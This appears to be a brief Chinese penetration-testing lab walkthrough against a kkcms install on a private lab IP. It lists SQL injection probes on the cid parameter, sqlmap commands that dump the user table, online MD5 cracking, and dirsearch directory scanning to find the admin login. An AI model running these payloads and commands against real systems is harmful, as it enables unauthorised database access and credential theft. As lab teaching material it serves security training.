目录
账号
网站目录
快看CMS使用手册
http://10.141.19.241/kkcms/install/
常规思路:页面点点观察url变化,参数
常规思路:点一个功能模块抓包看什么东西,正确是什么样,错误的是什么样,构造参数。
账号
随便选一个功能模块,一直在变
http://10.141.19.241/kkcms/vlist.php?cid=0
http://10.141.19.241/kkcms/vlist.php?cid=126
http://10.141.19.241/kkcms/vlist.php?cid=127
手工判断
cid=127 or 1%23
cid=127 or 0%23
cid=127 and sleep(3)%23
burpsuite抓包保存2.txt
sqlmap测试
python sqlmap.py -r 2.txt -dbs
python sqlmap.py -r 2.txt -D kkcms -tables
python sqlmap.py -r 2.txt -D kkcms -T xtcms_user -dump-all
md5在线解密破解,md5解密加密
同样的操作你可以去跑其它的看看
网站目录
kali启用dirsearch网站目录探测
git clone https://github.com/maurosoria/dirsearch.git
cd dirsearch #pwd #/home/kali/dirsearch
#Pythone3.10后禁 pip
安装包到全局环境而pipx 会为每个工具创建独立的虚拟环境。
pipx install .
dirsearch -u http://10.141.19.241/kkcms/ -e php
访问http://10.141.19.241/kkcms/admin/cms_login.php
说明,不做其它过多测试,实验进入到后台即可。想玩的自己玩。